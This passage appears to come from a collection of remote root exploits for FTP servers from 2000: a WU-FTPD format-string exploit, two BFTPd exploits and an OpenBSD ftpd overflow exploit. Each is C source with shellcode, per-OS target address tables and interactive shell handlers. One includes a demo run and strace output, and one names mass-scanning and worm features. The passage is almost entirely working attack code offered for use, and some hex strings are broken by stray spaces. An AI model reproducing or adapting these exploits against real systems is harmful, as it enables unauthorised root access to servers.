"\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\x c8\x88"
"\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x 0c\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\x c0\x31"
"\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30\x62\x 69\x6e"
"\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x 6c\x69"
"\x6e\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x 69\x65"
"\x2e\x63\x6f\x6d";
char bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\x c0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x 31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\x01\x53\x53\x b0\x88"
"\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x 80\x31"
"\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\x c9\x31"
"\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x 75\xf1"
"\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\x cd\x80"
"\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x 46\x07"
"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x 56\x0c"
"\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x 53\x53"
"\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\x30\x62\x69\x 6e\x30"
"\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x 69\x6e"
"\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x 65\x2e"
"\x63\x6f\x6d";
struct platforms
{
char *os;
char *version;
char *code;
int align;
int eipoff;
long ret;
long retloc;
int sleep;
};
struct platforms targ[] =
{
{ "FreeBSD 3.4-STABLE", "2.6.0-ports", bsdcode, 2, 1024, 0x80b1f10, 0xbfbfcc04, 0 },
{ "FreeBSD 5.0-CURRENT", "2.6.0-ports", bsdcode, 2, 1024, 0x80b1510, 0xbfbfec0c, 0 },
{ "FreeBSD 3.4-STABLE", "2.6.0-packages", bsdcode, 2, 1024, 0x80b1510, 0xbfbfe798, 0 },
{ "FreeBSD 3.4-STABLE", "2.6.0-venglin", bsdcode, 2, 1024, 0x807078c, 0xbfbfcc04, 0 },
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf74, 0 },
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd074, 0 },
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf84, 0 },
{ "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd04c, 0 },
{ "RedHat Linux 6.2-SMP", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd0e4, 0 },
{ NULL, NULL, NULL, 0, 0, 0, 0 }
};
long getip(name)
char *name;
{
struct hostent *hp;
long ip;
extern int h_errno;
if ((ip = inet_addr(name)) < 0)
{
if (!(hp = gethostbyname(name)))
{
fprintf(stderr, "gethostbyname(): %s\n",
strerror(h_errno));
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}
int connecttoftp(host, port)
char *host;
int port;
{
int sockfd;
struct sockaddr_in cli;
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_addr.s_addr=getip(host);
cli.sin_port = htons(port);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
return -1;
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
close(sockfd);
return -1;
}
cin = fdopen(sockfd, "r");
cout = fdopen(sockfd, "w");
if (!cin || !cout)
{
close(sockfd);
return -1;
}
return sockfd;
}
int command(const char *fmt, ...)
{
char buf1[BUFSIZ], buf2[BUFSIZ*2], *p, *q;
va_list args;
if (!cout)
return -1;
bzero(buf1, BUFSIZ);
bzero(buf2, BUFSIZ*2);
va_start(args, fmt);
vsnprintf(buf1, BUFSIZ, fmt, args);
va_end(args);
for (p=buf1,q=buf2;*p;p++,q++)
{
if (*p == '\xff')
{
*q++ = '\xff';
*q = '\xff';
}
else
*q = *p;
}
fprintf(cout, "%s", buf2);
#ifdef DEBUG
fprintf(stderr, "--> ");
fprintf(stderr, "%s", buf2);
fputc('\n', stderr);
#endif
fputs("\r\n", cout);
(void)fflush(cout);
return 0;
}
int getreply(v)
int v;
{
if (!(fgets(recvbuf, BUFSIZ, cin)))
return -1;
if (v)
fprintf(stderr, "<-- %s", recvbuf);
return 0;
}
int logintoftp(login, passwd)
char *login, *passwd;
{
do
repl;
while (strncmp(recvbuf, "220 ", 4));
if ((command("USER %s", login)) < 0)
return -1;
repl;
if (strncmp(recvbuf, "331", 3))
{
puts(recvbuf);
return -1;
}
if ((command("PASS %s", passwd) < 0))
return -1;
do
repl;
while (strncmp(recvbuf, "230 ", 4));
return 0;
}
int checkvuln(void)
{
command("SITE EXEC %%p");
repl;
if(strncmp(recvbuf, "200-", 4))
return -1;
if(strncmp(recvbuf+4, "0x", 2))
return -1;
repl;
return 0;
}
int findeip(eipoff, align)
int eipoff, align;
{
int i, j, off;
char *p1;
char eip1[10], eip2[10];
for (i=eipoff;;i+=8)
{
fprintf(stderr, "at offset %d\n", i);
strcpy(sendbuf, "SITE EXEC ");
for (j=0;j<align;j++) strcat(sendbuf, "a");
strcat(sendbuf, "abcd");
for (j=0;j<eipoff/8;j++) strcat(sendbuf, "%%.f");
for (j=0;j<(i-eipoff)/8;j++) strcat(sendbuf, "%%d%%d");
strcat(sendbuf, "|%%.8x|%%.8x");
if (command(sendbuf) < 0)
return -1;
repl;
if (!(p1 = strchr(recvbuf, '|')))
return -1;
strncpy(eip1, p1+1, 8);
strncpy(eip2, p1+10, 8);
eip1[8] = eip2[8] = '\0';
if (!(strcmp(eip1, "64636261")))
{
off = i;
break;
}
if (!(strcmp(eip2, "64636261")))
{
off = i + 4;
break;
}
repl;
}
repl;
return off;
}
char *putshell(type)
int type;
{
static char buf[400];
int noplen;
char *code = targ[type].code;
noplen = sizeof(buf) - strlen(code) - 2;
memset(buf, 0x90, noplen);
buf[noplen+1] = '\0';
strcat(buf, code);
return buf;
}
int overwrite(ptr, off, align, retloc, eipoff)
long ptr, retloc;
int off, align, eipoff;
{
int i, size = 0;
char buf[100];
fprintf(stderr, "RET: %p, RET location: %p,"
" RET location offset on stack: %d\n",
(void *)ptr, (void *)retloc, off);
if (off >= 12)
{
strcpy(sendbuf, "SITE EXEC ");
for (i=0;i<eipoff/8;i++) strcat(sendbuf, "%%.f");
for (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, "%%d%%d");
if (((off-eipoff-8) % 8) != 0) strcat(sendbuf, "%%d%%d");
if (command(sendbuf) < 0)
return -1;
repl;
size = strlen(recvbuf+4) - 2;
repl;
}
fprintf(stderr, "Reply size: %d, New RET: %p\n", size,
(void *)(ptr-size));
strcpy(sendbuf, "SITE EXEC ");
for (i=0;i<align;i++) strcat(sendbuf, "a");
sprintf(buf, "%c%c%c%c", ((int)retloc & 0xff),
(((int)retloc & 0xff00) >> 8),
(((int)retloc & 0xff0000) >> 16),
(((int)retloc & 0xff000000) >> 24));
strcat(sendbuf, buf);
for (i=0;i<eipoff/8;i++) strcat(sendbuf, "%%.f");
for (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, "%%d%%d");
if (((off-eipoff-8) % 8) != 0) strcat(sendbuf, "%%d%%d");
strcat(sendbuf, "%%.");
sprintf(buf, "%d", (int)ptr-size);
strcat(sendbuf, buf);
strcat(sendbuf, "d%%n");
if (command(sendbuf) < 0)
return -1;
return 0;
}
int sh(sockfd)
int sockfd;
{
char buf[BUFSIZ];
int c;
fd_set rf, drugi;
char cmd[] = "uname -a ; pwd ; id\n";
FD_ZERO(&rf);
FD_SET(0, &rf);
FD_SET(sockfd, &rf);
write(sockfd, cmd, strlen(cmd));
while (1)
{
bzero(buf, BUFSIZ);
memcpy (&drugi, &rf, sizeof(rf));
select(sockfd+1, &drugi, NULL, NULL, NULL);
if (FD_ISSET(0, &drugi))
{
c = read(0, buf, BUFSIZ);
send(sockfd, buf, c, 0x4);
}
if (FD_ISSET(sockfd, &drugi))
{
c = read(sockfd, buf, BUFSIZ);
if (c<0) return 0;
write(1,buf,c);
}
}
}
int main(argc, argv)
int argc;
char **argv;
{
extern int optind, opterr;
extern char *optarg;
int ch, type, port, eipoff, fd, retofs, retlocofs, align, i, retoff;
long ret, retloc;
char login[BUFSIZ], password[BUFSIZ];
opterr = retofs = retlocofs = 0;
strcpy(login, "ftp");
type = -1;
port = 21;
while ((ch = getopt(argc, argv, "l:f:s:t:o")) != -1)
switch((char)ch)
{
case 'l':
strcpy(login, optarg);
break;
case 't':
type = atoi(optarg);
break;
case 'o':
port = atoi(optarg);
break;
case 'f':
retofs = atoi(optarg);
break;
case 's':
retlocofs = atoi(optarg);
break;
case '?':
default:
puts(usage);
exit(0);
}
argc -= optind;
argv += optind;
fprintf(stderr, "PanBobek v1.1 by [email protected]\n\n");
if (type < 0)
{
fprintf(stderr, "Please select platform:\n");
for (i=0;targ[i].os;i++)
{
fprintf(stderr, "\t-t %d : %s %s (%p / %p)\n", i,
targ[i].os, targ[i].version,
(void *)targ[i].ret,
(void *)targ[i].retloc);
}
exit(0);
}
fprintf(stderr, "Selected platform: %s with WUFTPD %s\n\n",
targ[type].os, targ[type].version);
eipoff = targ[type].eipoff;
align = targ[type].align;
ret = targ[type].ret;
retloc = targ[type].retloc;
retloc += retlocofs;
ret += retofs;
if (argc != 1)
{
puts(usage);
exit(0);
}
strcpy(password, putshell(type));
if ((fd = connecttoftp(*argv, port)) < 0)
{
(void)fprintf(stderr, "Connection to %s failed.\n", *argv);
exit(1);
}
(void)fprintf(stderr, "Connected to %s. Trying to log in.\n", *argv);
if (logintoftp(login, password) < 0)
{
(void)fprintf(stderr, "Logging in to %s (%s) failed.\n",
*argv, login);
exit(1);
}
(void)fprintf(stderr, "Logged in as %s. Checking vulnerability.\n",
login);
sleep(targ[type].sleep);
if (checkvuln() < 0)
{
(void)fprintf(stderr, "Sorry, this version isn't"
" vulnerable or uses internal vsnprintf().\n");
exit(1);
}
(void)fprintf(stderr, "Ok, trying to find offset (initial: %d)\n",
eipoff);
if ((retoff = findeip(eipoff, align)) < 0)
{
(void)fprintf(stderr, "\nError finding offset. Adjust"
" align.\n");
exit(1);
}
if (overwrite(ret, retoff, align, retloc, eipoff) < 0)
{
(void)fprintf(stderr, "Error overwriting RET addr.\n");
exit(1);
}
fprintf(stderr, "Wait up to few minutes for reply. It depends on "
"victim's CPU speed.\nEnjoy your shell.\n");
sh(fd);
exit(0);
}
// [2000-11-21]
21 BFTPd vsprintf() Format Strings Exploit
*
* Copyright (c) 2000 - Security.is
*
* The following material may be freely redistributed, provided
* that the code or the disclaimer have not been partly removed,
* altered or modified in any way. The material is the property
* of security.is. You are allowed to adopt the represented code
* in your programs, given that you give credits where it's due.
*
* A no-name ftp-server has a serious bug which leads to remote root.
* Anyway, we exploit vsprintf() via format-string.
*
* Discovered/coded by: DiGiT - [email protected]
* Greets: security.is, ADM
* note: Coded during security.is weekend ;>
*
* Run like: (./bftpexp ; cat) | nc bftpd.victim.com 21
* offset is optional and is arg1
*
*/
#include <stdio.h>
char shellcode[] =
"\x31\xc0\x31\xdb\x04\x0b\xcd\x80\x31\xc0\x40\x40\x cd\x80\x85"
"\xc0\x75\x28\x89\xd9\x31\xc0\x41\x04\x3f\xcd\x80\x 31\xc0\x04"
"\x3f\x41\xeb\x1f\x31\xc0\x5f\x89\x7f\x08\x88\x47\x 07\x89\x47"
"\x0c\x89\xfb\x8d\x4f\x08\x8d\x57\x0c\x04\x0b\xcd\x 80\x31\xc0"
"\x31\xdb\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define ADDR 0xbffff83c
int main(int argc, char *argv[])
{
char lenbuf[1024],nopbuf[256], addrbuf[32], buf[256];
int offset=0,length, nopcount=100,i;
long nop_addr = ADDR;
if(argc > 1)
offset = atoi(argv[1]);
memset (nopbuf, '\x90', nopcount);
nop_addr = nop_addr + offset;
strcpy(buf, nopbuf);
strcat(buf, shellcode);
length=1024-strlen(shellcode)-nopcount+4-14;
strcat(buf, "%.");
sprintf(lenbuf, "%dd", length);
strcat(buf, lenbuf);
sprintf(addrbuf, "%c%c%c%c",
(unsigned char) ((nop_addr >> 0) & 0xff),
(unsigned char) ((nop_addr >> 8) & 0xff),
(unsigned char) ((nop_addr >> 16) & 0xff),
(unsigned char) ((nop_addr >> 24) & 0xff));
for(i = 0 ; i < 4 ; i++)
strcat(buf, addrbuf);
fprintf(stderr, "Bftpd remote exploit, by DiGiT\n");
fprintf(stderr, "Using Address = 0x%x\n", nop_addr);
printf("%s\n", buf);
return 0;
}
// [2000-11-29]
21 BFTPd 1.0.12 Remote Exploit
/*
Creates a filname to exploit the bug in bftpd 1.0.12
Create the file, cwd in the shell directory and nlist the file directory.
Coded by korty <[email protected]>
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <fcntl.h>
#define LEN 205
int main (int argc, char **argv)
{
char buf[LEN + 12];
int ret = 0xbffffa80;
int *p;
int fp;
char code[]=
/*
* Linux/x86
*
* toupper() evasion, standard execve() /bin/sh (used eg. in various
* imapd exploits). Goes through a loop adding 0x20 to the
* (/bin/sh -= 0x20) string (ie. yields /bin/sh after addition).
*/
/* main: */
"\xeb\x29" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
"\x29\xc9" /* subl %ecx, %ecx */
"\x89\xf3" /* movl %esi, %ebx */
"\x89\x5e\x08" /* movl %ebx, 0x08(%esi) */
"\xb1\x07" /* movb $0x07, %cl */
/* loopz: */
"\x80\x03\x20" /* addb $0x20, (%ebx) */
"\x43" /* incl %ebx */
"\xe0\xfa" /* loopne loopz */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\x29\xc0" /* subl %eax, %eax */
"\x40" /* incl %eax */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\xd2\xff\xff\xff" /* call start */
"\x0f\x42\x49\x4e\x0f\x53\x48"; /* /bin/sh -= 0x20 */
if (argc > 1) {
ret += atoi(argv[1]);
fprintf(stderr, "Using ret %#010x\n", ret);
}
memset(buf, '\x90', LEN);
memcpy(buf + LEN - strlen(code), code, strlen(code));
p = (int *) (buf + LEN);
*p++ = ret;
*p++ = ret;
*p = 0;
fp = open(buf, O_CREAT);
if(fp < 0) perror("buf");
close(fp);
}
/*
-- BEGIN list.c --
#include <stdio.h>
int main()
{
#define USER "cb"
#define PASS "PasSwoRd"
#define PORT "port 127,0,0,1,4,4" // Data on the port 1028 with the addr 127.0.0.1
#define CWD "cwd longfile"
#define LIST "list"
printf("user %s\n", USER);
sleep(1);
printf("pass %s\n", PASS);
sleep(1);
printf("%s\n", PORT);
sleep(1);
printf("%s\n", CWD);
sleep(1);
printf("%s\n", LIST);
}
-- END list.c --
A) DEMO
tshaw:~/longfile$ gcc -o exploit exploit.c
tshaw:~/longfile$ ls
exploit* exploit.c list.c
tshaw:~/longfile$ ls
exploit* exploit.c list.c
tshaw:~/longfile$ ./exploit
tshaw:~/longfile$ ls
exploit*
exploit.c
list.c
\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\3 13)^)\311\211\323\211^\b\221\a\200\003\ C
\300\332)\300\210F\a\211F\f\220\v\203\323\211K\b\2 11S\f\311\200)\300\@\311\200\310\322\333
\333\333\013BIN\013SH\200\332\333\233\200\332\333\ 233*
tshaw:~/longfile$
tshaw:~/longfile$ gcc -o list list.c
tshaw:~/longfile$ nc -l -p 1028 &
[1] 29973
tshaw:~/longfile$
tshaw:~/longfile$ (./list ; cat) | nc localhost 21
220 bftpd 1.0.12 at 127.0.0.1 ready.
331 Password please.
230 User logged in.
200 PORT 127.0.0.1:1028 OK
250 OK
150 Data connection established.
drwxr-xr-x 2 1000 100 4096 Dec 8 04:06 .
drwxr-xr-x 55 1000 100 4096 Dec 8 04:02 ..
-rw-r--r-- 1 1000 100 323 Dec 8 04:06 list.c
-rwxr-xr-x 1 1000 100 11931 Dec 8 04:06 list
-rw-r--r-- 1 1000 100 2178 Dec 8 03:54 exploit.c
-rwxr-xr-x 1 1000 100 12861 Dec 8 03:56 exploit
-r-xr--r-- 1 1000 100 0 Dec 8 03:56 릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱� �릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱� �릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱� ��릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱?^)??? C猩)핂F덯
?
뉡뜊S
?)??脘BINSH€????
[1]+ Done nc -l -p 1028
tshaw:~/longfile$
B) STRACE OUTPUT
tshaw:~# ps -aef |grep bftpd
cb 30128 62 0 Dec04 ? 00:00:00 bftpd
root 30136 30024 0 Dec04 ttyqa 00:00:00 grep bftpd
tshaw:~# strace -p 30128
read(0, "\n", 4096) = 1
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
setsockopt(4, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(4, SOL_SOCKET, SO_SNDBUF, [65536], 4) = 0
bind(4, {sin_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
connect(4, {sin_family=AF_INET, sin_port=htons(1028), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
write(2, "150 Data connection established."..., 34) = 34
open("/dev/null", O_RDONLY|O_NONBLOCK|0x10000) = -1 ENOENT (No such file or directory)
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
open(".", O_RDONLY|O_NONBLOCK|0x10000) = 5
fstat(5, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
fcntl(5, F_SETFD, FD_CLOEXEC) = 0
brk(0x8052000) = 0x8052000
getdents(5, /* 7 entries */, 3933) = 328
stat("./.", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
send(4, "drwxr-xr-x 2 1000 100 "..., 58, 0) = 58
stat("./..", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
send(4, "drwxr-xr-x 55 1000 100 "..., 59, 0) = 59
stat("./list.c", {st_mode=S_IFREG|0644, st_size=323, ...}) = 0
send(4, "-rw-r--r-- 1 1000 100 "..., 63, 0) = 63
stat("./list", {st_mode=S_IFREG|0755, st_size=11931, ...}) = 0
send(4, "-rwxr-xr-x 1 1000 100 "..., 61, 0) = 61
stat("./exploit.c", {st_mode=S_IFREG|0644, st_size=2178, ...}) = 0
send(4, "-rw-r--r-- 1 1000 100 "..., 66, 0) = 66
stat("./exploit", {st_mode=S_IFREG|0755, st_size=12861, ...}) = 0
send(4, "-rwxr-xr-x 1 1000 100 "..., 64, 0) = 64
stat("./릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱� �릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱� ��릱릱릱릱릱릱릱릱릱릱릱?
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱� �릱릱릱릱릱릱릱릱릱릱릱릱먮)^)??? C猩)핂F덯
?
뉡뜊S
?)??脘BINSH€????, {st_mode=S_IFREG|S_ISUID|0544, st_size=0, ...}) = 0
send(4, "-r-xr--r-- 1 1000 100 "..., 270, 0) = 270
execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = -1 ENOENT (No such file or directory)
_exit(-1073743151) = ?
tshaw:~#
*/
// [2000-12-11]
21 OpenBSD 2.6 / 2.7ftpd Remote Exploit
/*
h0h0h0 0-day k0d3z
Exploit by Scrippie, help by dvorak and jimjones
greets to sk8
Not fully developt exploit but it works most of the time ;)
Things to add:
- automatic writeable directory finding
- syn-scan option to do mass-scanning
- worm capabilities? (should be done seperatly using the -C option
11/13/2000
*/
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
void usage(char *program);
char *strcreat(char *, char *, int);
char *longToChar(unsigned long);
char *xrealloc(void *, size_t);
void xfree(char **ptr);
char *xmalloc(size_t);
int xconnect(char *host, u_short port);
void xsend(int fd, char *buf);
void xsendftpcmd(int fd, char *command, char *param);
void xrecieveall(int fd, char *buf, int size);
void xrecieve(int fd, char *buf, int size);
void ftp_login(int fd, char *user, char *password);
void exploit(int fd);
int verbose = 0;
/*
Written by dvorak, garbled up by "Smegma" with a word xor 0xaabb mask
to get rid of dots and slashes.
*/
char heavenlycode[] =
"\x31\xc0\x89\xc1\x80\xc1\x02\x51\x50\x04\x5a\x50\x cd\x80"
"\xeb\x10\x5e\x31\xc9\xb1\x4a\x66\x81\x36\xbb\xaa\x 46\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xff\xff \xff\x50\xcf\xe5\x9b\x7b\xf
a\xbf\xbd\xeb\x67\x3b\xfc\x8a\x6a\x33\xec\xba\xae\ x33\xfa\x76\x2a\x8a\x6a\xeb\x22\xfd\xb5\x36\xf4\xa 5\xf9\xbf\xaf\xeb\x67\x3b\x2
3\x7a\xfc\x8a\x6a\xbf\x97\xeb\x67\x3b\xfb\x8a\x6a\ xbf\xa4\xf3\xfa\x76\x2a\x36\xf4\xb9\xf9\x8a\x6a\xb f\xa6\xeb\x67\x3b\x27\xe5\xb
4\xe8\x9b\x7b\xae\x86\xfa\x76\x2a\x8a\x6a\xeb\x22\ xfd\x8d\x36\xf4\x93\xf9\x36\xf4\x9b\x23\xe5\x82\x3 2\xec\x97\xf9\xbf\x91\xeb\x6
7\x3b\x42\x2d\x55\x44\x55\xfa\xeb\x95\x84\x94\x84\ x95\x85\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x9 5\x85\x95\x84\x94\x84\x95\x8
5\x95\x84\x94\x84\x95\xeb\x94\xc8\xd2\xc4\x94\xd9\ xd3";
char user[255] = "anonymous";
char pass[255] = "[email protected]";
char write_dir[PATH_MAX] = "/";
int ftpport = 21;
unsigned long int ret_addr = 0;
#define CMD_LOCAL 0
#define CMD_REMOTE 1
int command_type = -1;
char *command = NULL;
struct typeT {
char *name;
unsigned long int ret_addr;
};
#define NUM_TYPES 2
struct typeT types[NUM_TYPES] = {
"OpenBSD 2.6", 0xdfbfd0ac,
"OpenBSD 2.7", 0xdfbfd0ac};
void
usage(char *program)
{
int i;
fprintf(stderr,
"\nUsage: %s [-h host] [-f port] [-u user] [-p pass] [-d directory] [-t type]\n\t\t[-r retaddr] [-c command]
[-C command]\n\n"
"Directory should be an absolute path, writable by the user.\n"
"The argument of -c will be executed on the remote host\n"
"while the argument of -C will be executed on the local\n"
"with its filedescriptors connected to the remote host\n"
"Valid types:\n",
program);
for (i = 0; i < NUM_TYPES; i++) {
printf("%d : %s\n", i, types[i].name);
}
exit(-1);
}
main(int argc, char **argv)
{
unsigned int i;
int opt, fd;
unsigned int type = 0;
char *hostname = "localhost";
if (argc < 2)
usage(argv[0]);
while ((opt = getopt(argc, argv, "h:r:u:f:d:t:vp:c:C:")) != -1) {
switch (opt) {
case 'h':
hostname = optarg;
break;
case 'C':
command = optarg;
command_type = CMD_LOCAL;
break;
case 'c':
command = optarg;
command_type = CMD_REMOTE;
break;
case 'r':
ret_addr = strtoul(optarg, NULL, 0);
break;
case 'v':
verbose++;
break;
case 'f':
if (!(ftpport = atoi(optarg))) {
fprintf(stderr, "Invalid destination port - %s\n", optarg);
exit(-1);
}
exit(-1);
break;
case 'u':
strncpy(user, optarg, sizeof(user) - 1);
user[sizeof(user) - 1] = 0x00;
break;
case 'p':
strncpy(pass, optarg, sizeof(pass) - 1);
pass[sizeof(pass) - 1] = 0x00;
break;
case 'd':
strncpy(write_dir, optarg, sizeof(write_dir) - 1);
write_dir[sizeof(write_dir) - 1] = 0x00;
if ((write_dir[0] != '/'))
usage(argv[0]);
if ((write_dir[strlen(write_dir) - 1] != '/'))
strncat(write_dir, "/", sizeof(write_dir) - 1);
break;
case 't':
type = atoi(optarg);
if (type > NUM_TYPES)
usage(argv[0]);
break;
default:
usage(argv[0]);
}
}
if (ret_addr == 0)
ret_addr = types[type].ret_addr;
if ((fd = xconnect(hostname, ftpport)) == -1)
exit(-1);
else
printf("Connected to remote host! Sending evil codes.\n");
ftp_login(fd, user, pass);
exploit(fd);
}
int
ftp_cmd_err(int fd, char *command, char *param, char *res, int size, char * msg)
{
xsendftpcmd(fd, command, param);
xrecieveall(fd, res, size);
if (res == NULL)
return 0;
if (verbose)
printf("%s\n", res);
if (msg && (res[0] != '2')) {
fprintf(stderr, "%s\n", msg);
exit(-1);
}
return (res[0] != '2');
}
void shell(int fd)
{
fd_set readfds;
char buf[1];
char *tst = "echo ; echo ; echo HAVE FUN ; id ; uname -a\n";
write(fd, tst, strlen(tst));
while (1) {
FD_ZERO(&readfds);
FD_SET(0, &readfds);
FD_SET(fd, &readfds);
select(fd + 1, &readfds, NULL, NULL, NULL);
if (FD_ISSET(0, &readfds)) {
if (read(0, buf, 1) != 1) {
perror("read");
exit(1);
}
write(fd, buf, 1);
}
if (FD_ISSET(fd, &readfds)) {
if (read(fd, buf, 1) != 1) {
perror("read");
exit(1);
}
write(1, buf, 1);
}
}
}
void do_command(int fd)
{
char buffer[1024];
int len;
if (command_type == CMD_LOCAL) {
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(command, command, NULL);
exit (2);
}
write(fd, command, strlen(command));
write(fd, "\n", 1);
while ((len = read(fd, buffer, sizeof(buffer))) > 0) {
write(1, buffer, len);
}
exit (0);
}
void execute_command(fd)
{
}
int exploit_ok(int fd)
{
char result[1024];
xsend(fd, "id\n");
xrecieve(fd, result, sizeof(result));
return (strstr(result, "uid=") != NULL);
}
void exploit(int fd)
{
char res[1024];
int heavenlycode_s;
char *dir = NULL;
ftp_cmd_err(fd, "CWD", write_dir, res, 1024, "Can't CWD to write_dir");
dir = strcreat(dir, "A", 255 - strlen(write_dir));
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
xfree(&dir);
/* next on = 256 */
dir = strcreat(dir, "A", 255);
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
xfree(&dir);
/* next on = 512 */
heavenlycode_s = strlen(heavenlycode);
dir = strcreat(dir, "A", 254 - heavenlycode_s);
dir = strcreat(dir, heavenlycode, 1);
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
xfree(&dir);
/* next on = 768 */
dir = strcreat(dir, longToChar(ret_addr), 252 / 4);
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
xfree(&dir);
/* length = 1020 */
/* 1022 moet " zijn */
dir = strcreat(dir, "AAA\"", 1);
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
xfree(&dir);
/* and tell it to blow up */
ftp_cmd_err(fd, "PWD", NULL, res, 1024, NULL);
if (!exploit_ok(fd)) {
if (command != NULL) {
exit (2);
}
fprintf(stderr, "Exploit failed\n");
exit (1);
}
if (command == NULL)
shell(fd);
else
do_command(fd);
}
char *
strcreat(char *dest, char *pattern, int repeat)
{
char *ret;
size_t plen, dlen = 0;
int i;
if (dest)
dlen = strlen(dest);
plen = strlen(pattern);
ret = (char *) xrealloc(dest, dlen + repeat * plen + 1);
if (!dest)
ret[0] = 0x00;
for (i = 0; i < repeat; i++) {
strcat(ret, pattern);
}
return (ret);
}
char *
longToChar(unsigned long blaat)
{
char *ret;
ret = (char *) xmalloc(sizeof(long) + 1);
memcpy(ret, &blaat, sizeof(long));
ret[sizeof(long)] = 0x00;
return (ret);
}
char *
xrealloc(void *ptr, size_t size)
{
char *wittgenstein_was_a_drunken_swine;
if (!(wittgenstein_was_a_drunken_swine = (char *) realloc(ptr, size))) {
fprintf(stderr, "Cannot calculate universe\n");
exit(-1);
}
return (wittgenstein_was_a_drunken_swine);
}
void
